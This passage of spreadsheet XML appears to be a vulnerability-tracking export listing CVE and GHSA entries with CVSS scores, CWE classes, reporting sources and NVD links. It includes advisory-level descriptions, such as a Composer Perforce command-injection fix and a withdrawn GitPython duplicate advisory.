t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1054" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1054" s="5" t="inlineStr"><is><t>CVE-2026-73315</t></is></c><c r="D1054" s="5" t="n"><v>7.7</v></c><c r="E1054" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1054" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1054" s="5" t="inlineStr" /><c r="H1054" s="5" t="n"><v>0.003</v></c><c r="I1054" s="5" t="inlineStr" /><c r="J1054" s="5" t="inlineStr" /><c r="K1054" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1054" s="5" t="inlineStr" /><c r="M1054" s="5" t="inlineStr" /><c r="N1054" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1054" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1054" s="5" t="inlineStr" /><c r="Q1054" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1054" s="5" t="inlineStr"><is><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is></c><c r="S1054" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73315</t></is></c></row><row r="1055"><c r="A1055" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1055" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1055" s="5" t="inlineStr"><is><t>CVE-2026-75033</t></is></c><c r="D1055" s="5" t="n"><v>7.7</v></c><c r="E1055" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1055" s="5" t="inlineStr"><is><t>meissner@suse.de</t></is></c><c r="G1055" s="5" t="inlineStr" /><c r="H1055" s="5" t="n"><v>0.002</v></c><c r="I1055" s="5" t="inlineStr" /><c r="J1055" s="5" t="inlineStr" /><c r="K1055" s="5" t="inlineStr" /><c r="L1055" s="5" t="inlineStr" /><c r="M1055" s="5" t="inlineStr" /><c r="N1055" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1055" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1055" s="5" t="inlineStr" /><c r="Q1055" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1055" s="5" t="inlineStr"><is><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is></c><c r="S1055" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75033</t></is></c></row><row r="1056"><c r="A1056" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1056" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1056" s="5" t="inlineStr"><is><t>CVE-2026-75569</t></is></c><c r="D1056" s="5" t="n"><v>7.7</v></c><c r="E1056" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1056" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G1056" s="5" t="inlineStr" /><c r="H1056" s="5" t="n"><v>0.004</v></c><c r="I1056" s="5" t="inlineStr" /><c r="J1056" s="5" t="inlineStr" /><c r="K1056" s="5" t="inlineStr" /><c r="L1056" s="5" t="inlineStr" /><c r="M1056" s="5" t="inlineStr" /><c r="N1056" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1056" s="5" t="inlineStr"><is><t>2026-08-19</t></is></c><c r="P1056" s="5" t="inlineStr" /><c r="Q1056" s="5" t="inlineStr"><is><t>CWE-1357</t></is></c><c r="R1056" s="5" t="inlineStr"><is><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is></c><c r="S1056" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75569</t></is></c></row><row r="1057"><c r="A1057" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1057" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1057" s="5" t="inlineStr"><is><t>CVE-2026-76640</t></is></c><c r="D1057" s="5" t="n"><v>7.7</v></c><c r="E1057" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1057" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1057" s="5" t="inlineStr" /><c r="H1057" s="5" t="n"><v>0.003</v></c><c r="I1057" s="5" t="inlineStr" /><c r="J1057" s="5" t="inlineStr" /><c r="K1057" s="5" t="inlineStr" /><c r="L1057" s="5" t="inlineStr" /><c r="M1057" s="5" t="inlineStr" /><c r="N1057" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1057" s="5" t="inlineStr"><is><t>2026-08-27</t></is></c><c r="P1057" s="5" t="inlineStr" /><c r="Q1057" s="5" t="inlineStr"><is><t>CWE-306, CWE-787</t></is></c><c r="R1057" s="5" t="inlineStr"><is><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is></c><c r="S1057" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76640</t></is></c></row><row r="1058"><c r="A1058" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1058" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1058" s="5" t="inlineStr"><is><t>CVE-2026-77909</t></is></c><c r="D1058" s="5" t="n"><v>7.7</v></c><c r="E1058" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1058" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1058" s="5" t="inlineStr" /><c r="H1058" s="5" t="n"><v>0.006</v></c><c r="I1058" s="5" t="inlineStr" /><c r="J1058" s="5" t="inlineStr" /><c r="K1058" s="5" t="inlineStr" /><c r="L1058" s="5" t="inlineStr" /><c r="M1058" s="5" t="inlineStr" /><c r="N1058" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1058" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1058" s="5" t="inlineStr" /><c r="Q1058" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="R1058" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in Azure CycleCloud allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1058" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77909</t></is></c></row><row r="1059"><c r="A1059" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1059" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1059" s="5" t="inlineStr"><is><t>CVE-2026-78623</t></is></c><c r="D1059" s="5" t="n"><v>7.7</v></c><c r="E1059" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1059" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1059" s="5" t="inlineStr" /><c r="H1059" s="5" t="n"><v>0.002</v></c><c r="I1059" s="5" t="inlineStr" /><c r="J1059" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1059" s="5" t="inlineStr" /><c r="L1059" s="5" t="inlineStr" /><c r="M1059" s="5" t="inlineStr" /><c r="N1059" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1059" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1059" s="5" t="inlineStr" /><c r="Q1059" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1059" s="5" t="inlineStr"><is><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is></c><c r="S1059" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78623</t></is></c></row><row r="1060"><c r="A1060" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1060" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1060" s="5" t="inlineStr"><is><t>CVE-2026-79750</t></is></c><c r="D1060" s="5" t="n"><v>7.7</v></c><c r="E1060" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1060" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1060" s="5" t="inlineStr" /><c r="H1060" s="5" t="n"><v>0.003</v></c><c r="I1060" s="5" t="inlineStr" /><c r="J1060" s="5" t="inlineStr" /><c r="K1060" s="5" t="inlineStr" /><c r="L1060" s="5" t="inlineStr" /><c r="M1060" s="5" t="inlineStr" /><c r="N1060" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1060" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1060" s="5" t="inlineStr" /><c r="Q1060" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="R1060" s="5" t="inlineStr"><is><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is></c><c r="S1060" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79750</t></is></c></row><row r="1061"><c r="A1061" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1061" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1061" s="5" t="inlineStr"><is><t>CVE-2026-81832</t></is></c><c r="D1061" s="5" t="n"><v>7.7</v></c><c r="E1061" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1061" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1061" s="5" t="inlineStr" /><c r="H1061" s="5" t="n"><v>0.003</v></c><c r="I1061" s="5" t="inlineStr" /><c r="J1061" s="5" t="inlineStr" /><c r="K1061" s="5" t="inlineStr"><is><t>ibm:app_connect_enterprise, ibm:integration_bus_for_z\/os</t></is></c><c r="L1061" s="5" t="inlineStr" /><c r="M1061" s="5" t="inlineStr" /><c r="N1061" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1061" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1061" s="5" t="inlineStr" /><c r="Q1061" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="R1061" s="5" t="inlineStr"><is><t>IBM App Connect Enterprise 13.0.1.0 through 13.0.8.1, and 12.0.1.0 through 12.0.12.28 and IBM Integration Bus for z/OS 10.1.0.0 through 10.1.0.7 SAP Adapter is vulnerable to an XML external entity (XXE) attack.</t></is></c><c r="S1061" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81832</t></is></c></row><row r="1062"><c r="A1062" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1062" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1062" s="5" t="inlineStr"><is><t>CVE-2026-82537</t></is></c><c r="D1062" s="5" t="n"><v>7.7</v></c><c r="E1062" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1062" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1062" s="5" t="inlineStr" /><c r="H1062" s="5" t="n"><v>0.003</v></c><c r="I1062" s="5" t="inlineStr" /><c r="J1062" s="5" t="inlineStr" /><c r="K1062" s="5" t="inlineStr" /><c r="L1062" s="5" t="inlineStr" /><c r="M1062" s="5" t="inlineStr" /><c r="N1062" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1062" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1062" s="5" t="inlineStr" /><c r="Q1062" s="5" t="inlineStr"><is><t>CWE-436</t></is></c><c r="R1062" s="5" t="inlineStr"><is><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is></c><c r="S1062" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82537</t></is></c></row><row r="1063"><c r="A1063" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1063" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1063" s="5" t="inlineStr"><is><t>CVE-2026-84361</t></is></c><c r="D1063" s="5" t="n"><v>7.7</v></c><c r="E1063" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1063" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1063" s="5" t="inlineStr" /><c r="H1063" s="5" t="n"><v>0.004</v></c><c r="I1063" s="5" t="inlineStr" /><c r="J1063" s="5" t="inlineStr" /><c r="K1063" s="5" t="inlineStr" /><c r="L1063" s="5" t="inlineStr"><is><t>composer:composer/composer</t></is></c><c r="M1063" s="5" t="inlineStr"><is><t>2.10.3, 2.2.30</t></is></c><c r="N1063" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1063" s="5" t="inlineStr" /><c r="P1063" s="5" t="inlineStr" /><c r="Q1063" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1063" s="5" t="inlineStr"><is><t>## Summary

If the `p4` Perforce CLI client is installed, a malicious dependency package from a package repository allowing arbitrary perforce source URLs (packagist.org is safe) could execute arbitrary commands when running `composer install` or `composer update`. Composer passed a package's Perforce source address to the `p4` CLI client without validating it. The `p4` CLI client accepts addresses that mean "run this local command" instead of "connect to this server". This is remote code execution with the privileges of the user or CI account running Composer.

## Am I affected?

You are only affected if all of the following are true:

- The Perforce `p4` command line client is installed and on the `PATH` of the machine running Composer.
- An attacker can control a package metadata's `source` section with a perforce type. Packagist.org does not allow perforce source metadata, so you are only exploitable if you rely on another Composer repository (any custom `composer`-type repository, or an inline `package` repository entry), or a `composer.lock` file you obtained from somewhere you do not trust.
- The package gets installed from source, either because it has no dist artifact or because source installs are selected (for example `--prefer-source`).

Plainly not affected: anyone without the `p4` client installed, which is the large majority of Composer users. Perforce is an optional VCS integration. Also not affected: projects that only consume packages from Packagist.org, which does not allow Perforce source repositories and therefore cannot serve a package with a Perforce source address.

Most realistic way to get hit: a developer workstation or CI image that has Perforce tooling installed, pulling packages from a private or third party Composer repository that an attacker has compromised.

## Patched versions

Composer now validates Perforce source addresses before handing them to the `p4` client, and accepts only real network endpoints (an optional `tcp`/`ssl` transport with a host and port). Addresses that make the client spawn a local process are rejected, and the package fails validation on both update and install, before any `p4` command runs. Fixed in Composer **2.10.3** and **2.2.30**.

Note: If you legitimately use Perforce with an unusual `P4PORT` value that is not a plain host and port, Composer will now reject it.

## Workarounds

Upgrading is the only complete fix.

Risk reduction short of upgrading:

- Remove the `p4` client from the `PATH` of machines that run Composer but do not use Perforce. This fully blocks this specific attack, since the vulnerability depends on that client being present.
- Restrict configured repositories to sources you control or trust, and treat lock files from untrusted sources as untrusted input.</t></is></c><c r="S1063" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84361</t></is></c></row><row r="1064"><c r="A1064" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1064" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1064" s="5" t="inlineStr"><is><t>CVE-2026-86207</t></is></c><c r="D1064" s="5" t="n"><v>7.7</v></c><c r="E1064" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1064" s="5" t="inlineStr"><is><t>a5532a13-c4dd-4202-bef1-e0b8f2f8d12b</t></is></c><c r="G1064" s="5" t="inlineStr" /><c r="H1064" s="5" t="n"><v>0.007</v></c><c r="I1064" s="5" t="inlineStr" /><c r="J1064" s="5" t="inlineStr" /><c r="K1064" s="5" t="inlineStr" /><c r="L1064" s="5" t="inlineStr" /><c r="M1064" s="5" t="inlineStr" /><c r="N1064" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1064" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1064" s="5" t="inlineStr" /><c r="Q1064" s="5" t="inlineStr"><is><t>CWE-305</t></is></c><c r="R1064" s="5" t="inlineStr"><is><t>An authentication bypass in N-central &lt; 2026.3 HF 3 leads to authentication bypass in internal only APIs</t></is></c><c r="S1064" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86207</t></is></c></row><row r="1065"><c r="A1065" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1065" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1065" s="5" t="inlineStr"><is><t>CVE-2026-9040</t></is></c><c r="D1065" s="5" t="n"><v>7.7</v></c><c r="E1065" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1065" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1065" s="5" t="inlineStr" /><c r="H1065" s="5" t="n"><v>0.001</v></c><c r="I1065" s="5" t="inlineStr" /><c r="J1065" s="5" t="inlineStr" /><c r="K1065" s="5" t="inlineStr" /><c r="L1065" s="5" t="inlineStr" /><c r="M1065" s="5" t="inlineStr" /><c r="N1065" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1065" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1065" s="5" t="inlineStr" /><c r="Q1065" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1065" s="5" t="inlineStr"><is><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is></c><c r="S1065" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9040</t></is></c></row><row r="1066"><c r="A1066" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1066" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1066" s="5" t="inlineStr"><is><t>GHSA-298h-jpq4-m665</t></is></c><c r="D1066" s="5" t="n"><v>7.7</v></c><c r="E1066" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1066" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1066" s="5" t="inlineStr" /><c r="H1066" s="5" t="inlineStr" /><c r="I1066" s="5" t="inlineStr" /><c r="J1066" s="5" t="inlineStr" /><c r="K1066" s="5" t="inlineStr" /><c r="L1066" s="5" t="inlineStr"><is><t>pip:GitPython</t></is></c><c r="M1066" s="5" t="inlineStr" /><c r="N1066" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1066" s="5" t="inlineStr" /><c r="P1066" s="5" t="inlineStr" /><c r="Q1066" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="R1066" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-9rj7-rf2p-w77r. This link is maintained to preserve external references.

## Original Description
GitPython before 3.1.58 contains a remote code execution vulnerability in Repo.init that forwards unsafe git options without validation. Attackers can supply a template parameter pointing to a directory with malicious git hooks that execute arbitrary code when git operations are performed on the initialized repository.</t></is></c><c r="S1066" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-298h-jpq4-m665</t></is></c></row><row r="1067"><c r="A1067" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1067" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1067" s="5" t="inlineStr"><is><t>CVE-2025-46418</t></is></c><c r="D1067" s="5" t="n"><v>7.6</v></c><c r="E1067" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1067" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G1067" s="5" t="inlineStr" /><c r="H1067" s="5" t="n"><v>0.007</v></c><c r="I1067" s="5" t="inlineStr" /><c r="J1067" s="5" t="inlineStr" /><c r="K1067" s="5" t="inlineStr" /><c r="L1067" s="5" t="inlineStr" /><c r="M1067" s="5" t="inlineStr" /><c r="N1067" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1067" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P1067" s="5" t="inlineStr" /><c r="Q1067" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1067" s="5" t="inlineStr"><is><t>Westermo WeOS 5.x starting from 5.24 allows OS command injection via a media definition.</t></is></c><c r="S1067" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2025-46418</t></is></c></row><row r="1068"><c r="A1068" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1068" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1068" s="5" t="inlineStr"><is><t>CVE-2026-77110</t></is></c><c r="D1068" s="5" t="n"><v>7.6</v></c><c r="E1068" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1068" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1068" s="5" t="inlineStr" /><c r="H1068" s="5" t="n"><v>0.007</v></c><c r="I1068" s="5" t="inlineStr" /><c r="J1068" s="5" t="inlineStr" /><c r="K1068" s="5" t="inlineStr"><is><t>adobe:commerce, adobe:commerce_b2b, adobe:magento</t></is></c><c r="L1068" s="5" t="inlineStr" /><c r="M1068" s="5" t="inlineStr" /><c r="N1068" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1068" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1068" s="5" t="inlineStr" /><c r="Q1068" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1068" s="5" t="inlineStr"><is><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is></c><c r="S1068" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77110</t></is></c></row><row r="1069"><c r="A1069" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1069" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1069" s="5" t="inlineStr"><is><t>CVE-2026-79749</t></is></c><c r="D1069" s="5" t="n"><v>7.6</v></c><c r="E1069" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1069" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1069" s="5" t="inlineStr" /><c r="H1069" s="5" t="n"><v>0.003</v></c><c r="I1069" s="5" t="inlineStr" /><c r="J1069" s="5" t="inlineStr" /><c r="K1069" s="5" t="inlineStr" /><c r="L1069" s="5" t="inlineStr" /><c r="M1069" s="5" t="inlineStr" /><c r="N1069" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1069" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1069" s="5" t="inlineStr" /><c r="Q1069" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1069" s="5" t="inlineStr"><is><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is></c><c r="S1069" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79749</t></is></c></row><row r="1070"><c r="A1070" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1070" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1070" s="5" t="inlineStr"><is><t>CVE-2026-82020</t></is></c><c r="D1070" s="5" t="n"><v>7.6</v></c><c r="E1070" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1070" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1070" s="5" t="inlineStr" /><c r="H1070" s="5" t="n"><v>0.003</v></c><c r="I1070" s="5" t="inlineStr" /><c r="J1070" s="5" t="inlineStr" /><c r="K1070" s="5" t="inlineStr" /><c r="L1070" s="5" t="inlineStr" /><c r="M1070" s="5" t="inlineStr" /><c r="N1070" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1070" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P1070" s="5" t="inlineStr" /><c r="Q1070" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="R1070" s="5" t="inlineStr"><is><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is></c><c r="S1070" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82020</t></is></c></row><row r="1071"><c r="A1071" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1071" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1071" s="5" t="inlineStr"><is><t>CVE-2026-82053</t></is></c><c r="D1071" s="5" t="n"><v>7.6</v></c><c r="E1071" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1071" s="5" t="inlineStr"><is><t>cna@mongodb.com</t></is></c><c r="G1071" s="5" t="inlineStr" /><c r="H1071" s="5" t="n"><v>0.002</v></c><c r="I1071" s="5" t="inlineStr" /><c r="J1071" s="5" t="inlineStr"><is><t>mongodb</t></is></c><c r="K1071" s="5" t="inlineStr"><is><t>mongodb:mongodb</t></is></c><c r="L1071" s="5" t="inlineStr" /><c r="M1071" s="5" t="inlineStr" /><c r="N1071" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1071" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1071" s="5" t="inlineStr" /><c r="Q1071" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1071" s="5" t="inlineStr"><is><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is></c><c r="S1071" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82053</t></is></c></row><row r="1072"><c r="A1072" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1072" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1072" s="5" t="inlineStr"><is><t>CVE-2026-85533</t></is></c><c r="D1072" s="5" t="n"><v>7.6</v></c><c r="E1072" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1072" s="5" t="inlineStr"><is><t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t></is></c><c r="G1072" s="5" t="inlineStr" /><c r="H1072" s="5" t="n"><v>0.002</v></c><c r="I1072" s="5" t="inlineStr" /><c r="J1072" s="5" t="inlineStr" /><c r="K1072" s="5" t="inlineStr" /><c r="L1072" s="5" t="inlineStr" /><c r="M1072" s="5" t="inlineStr" /><c r="N1072" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1072" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1072" s="5" t="inlineStr" /><c r="Q1072" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R1072" s="5" t="inlineStr"><is><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is></c><c r="S1072" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85533</t></is></c></row><row r="1073"><c r="A1073" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1073" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1073" s="5" t="inlineStr"><is><t>CVE-2026-86073</t></is></c><c r="D1073" s="5" t="n"><v>7.6</v></c><c r="E1073" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1073" s="5" t="inlineStr" /><c r="H1073" s="5" t="n"><v>0.002</v></c><c r="I1073" s="5" t="inlineStr" /><c r="J1073" s="5" t="inlineStr" /><c r="K1073" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1073" s="5" t="inlineStr" /><c r="M1073" s="5" t="inlineStr" /><c r="N1073" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1073" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1073" s="5" t="inlineStr" /><c r="Q1073" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1073" s="5" t="inlineStr"><is><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is></c><c r="S1073" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86073</t></is></c></row><row r="1074"><c r="A1074" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1074" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1074" s="5" t="inlineStr"><is><t>CVE-2021-44320</t></is></c><c r="D1074" s="5" t="n"><v>7.5</v></c><c r="E1074" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1074" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1074" s="5" t="inlineStr" /><c r="H1074" s="5" t="n"><v>0.004</v></c><c r="I1074" s="5" t="inlineStr" /><c r="J1074" s="5" t="inlineStr" /><c r="K1074" s="5" t="inlineStr" /><c r="L1074" s="5" t="inlineStr" /><c r="M1074" s="5" t="inlineStr" /><c r="N1074" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1074" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1074" s="5" t="inlineStr" /><c r="Q1074" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1074" s="5" t="inlineStr"><is><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is></c><c r="S1074" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2021-44320</t></is></c></row><row r="1075"><c r="A1075" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1075" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1075" s="5" t="inlineStr"><is><t>CVE-2026-0860</t></is></c><c r="D1075" s="5" t="n"><v>7.5</v></c><c r="E1075" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1075" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1075" s="5" t="inlineStr" /><c r="H1075" s="5" t="n"><v>0.002</v></c><c r="I1075" s="5" t="inlineStr" /><c r="J1075" s="5" t="inlineStr" /><c r="K1075" s="5" t="inlineStr" /><c r="L1075" s="5" t="inlineStr" /><c r="M1075" s="5" t="inlineStr" /><c r="N1075" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1075" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1075" s="5" t="inlineStr" /><c r="Q1075" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1075" s="5" t="inlineStr"><is><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is></c><c r="S1075" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-0860</t></is></c></row><row r="1076"><c r="A1076" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1076" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1076" s="5" t="inlineStr"><is><t>CVE-2026-12483</t></is></c><c r="D1076" s="5" t="n"><v>7.5</v></c><c r="E1076" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1076" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1076" s="5" t="inlineStr" /><c r="H1076" s="5" t="n"><v>0.004</v></c><c r="I1076" s="5" t="inlineStr" /><c r="J1076" s="5" t="inlineStr" /><c r="K1076" s="5" t="inlineStr" /><c r="L1076" s="5" t="inlineStr" /><c r="M1076" s="5" t="inlineStr" /><c r="N1076" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1076" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1076" s="5" t="inlineStr" /><c r="Q1076" s="5" t="inlineStr"><is><t>CWE-434</t></is></c><c 